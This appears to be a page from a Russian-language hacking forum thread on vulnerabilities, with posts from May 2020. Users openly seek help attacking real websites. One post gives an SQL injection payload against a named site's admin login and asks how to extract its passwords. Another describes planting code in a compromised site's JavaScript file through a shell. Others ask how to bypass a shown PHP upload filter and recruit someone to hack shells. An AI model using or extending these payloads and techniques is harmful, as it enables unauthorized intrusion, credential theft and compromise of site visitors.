HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2821  
Старый 20.05.2020, 23:14
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от FireRidlle  
FireRidlle said:

есть варианты как можно обойти ситауцию когда иньекция попадает в два запроса с раным количеством колонок и все же воспользоватся union based
Есть как минимум два уязвимых запроса, а может быть три или больше, случай не простой, есть над чем подумать и развернуться. Стоит посмотреть в сторону фрагментированных инъекций или объединённых запросов, варианты есть и пока они не проверены, утверждать однозначно нельзя. В текущем состоянии дел, всё сильно зависит от окружения, контекста и соответсвенно выбранного вектора атаки. Думаю, что на этом моменте, не имеет смысла описывать абстракные техники, уже не целесообразно, нужно работать с конкретным случаем напрямую.

Это что касается инъекции, но вполне возможно, что классическая схема SQLi => Admin => RCE, в данном случае будет куда предпочтительнее, чем просто видимая скуля.
 
Ответить с цитированием

  #2822  
Старый 22.05.2020, 17:56
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию



SQLi в Oracle с подлючением все нормально
 
Ответить с цитированием

  #2823  
Старый 24.05.2020, 15:46
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Есть возможность обойти?

Код:
Code:
$dir = './img/';
$name = $dir . basename($_FILES['uploadfile']['name']);
 
$ext = substr($_FILES['uploadfile']['name'],strpos($_FILES['uploadfile']['name'],'.'),strlen($_FILES['uploadfile']['name'])-1);
$filetypes = array('.bmp','.jpg','.png','.jpeg','.gif','.BMP','.JPG','.PNG','.JPEG','.GIF');

if(!in_array($ext,$filetypes)){
    echo "Данный формат файлов не поддерживается";
    }else{
    if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $name)) {
      echo "Изображение загружено";
    } else {
        echo "Ошибка";
    }
}
 
Ответить с цитированием

  #2824  
Старый 28.05.2020, 21:35
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Здравствуйте, помогите пожалуйста извлечь пароли, никак не получается (пароли идут blob)

Код:
Code:
doma-pizza.ru/admin/login/
поле login
admin') AND EXTRACTVALUE(7257,CONCAT(0x5c,0x717a7a7871,(SELECT (ELT(7257=7257,1))),0x717a787671)) AND ('sIKG'='sIKG&password=admin&submit=%D0%92%D1%85%D0%BE%D0%B4

back-end DBMS: MySQL >= 5.0.0
banner: '5.7.21-20-beget-5.7.21-20-1-log'

Таблица: PS_USER
Колонки: PS_USER_LOGIN,PS_USER_PASSWORD
Пробовал так как тут указывали, но ничего не вышло

/threads/431199/page-53#post-4390194
 
Ответить с цитированием

  #2825  
Старый 29.05.2020, 18:33
CrispyChikHotty
Guest
Сообщений: n/a
Провел на форуме:
955

Репутация: 0
По умолчанию

Всем привет. Нужен рутальщик для лома/шелов ссылок.

Телеграм: @santa_moonride
 
Ответить с цитированием

  #2826  
Старый 29.05.2020, 18:35
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию

Цитата:
Сообщение от CrispyChikHotty  
CrispyChikHotty said:

Нужен рутальщик
нормального рутальщика щас хрен где найдёшь!
 
Ответить с цитированием

  #2827  
Старый 29.05.2020, 20:59
CrispyChikHotty
Guest
Сообщений: n/a
Провел на форуме:
955

Репутация: 0
По умолчанию

Цитата:
Сообщение от ms13  
ms13 said:

нормального рутальщика щас хрен где найдёшь!
Буду надеяться, что он сам меня найдёт : D
 
Ответить с цитированием

  #2828  
Старый 30.05.2020, 17:12
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Не подскажите, есть сайт на ColdFusion 2018, два дня назад поставил свой код в js файл, проблема в том, что мой код то появляется, то его нету это со стороны обычного пользователя. Попытался 10 раз обновить страницу его нет, зашел на следующий день код есть. А если через шелл чекнуть то мой код постоянно в файле. Не понял истинную причину такого поведения. Вроде сайт на одном сервере, кэш сервера - прошло достаточно времени, кэш бразуера - я его постоянно чищу
 
Ответить с цитированием

  #2829  
Старый 30.05.2020, 22:25
testvalue
Guest
Сообщений: n/a
Провел на форуме:
1238

Репутация: 0
По умолчанию

Всем привет. Возник вопрос.

Есть запрос вида

Код:
Code:
https://site/dynamic/pin/?pin=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&activate=1
Получаю ошибку:

Код:
Code:
SQLSTATE[42000]: Syntax error or access violation: 3057 Incorrect user-level lock name 'WP_bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
Гугление ошибки привело к тому, что возможно я имею дело с функцией GET_LOCK() в mysql. И возможен такой вектор:

Код:
Code:
(concat(version(),repeat(0x1,99)),0)
Но к сожалению у меня не получается правильно составить запрос. Как отбросить префикс базы, который вываливается в ошибке и корректно составить запрос?

Спасибо, буду признателен за помощь.
 
Ответить с цитированием

  #2830  
Старый 01.06.2020, 16:52
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Вопрос все еще актуален, есть у кого-нибудь идеи?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ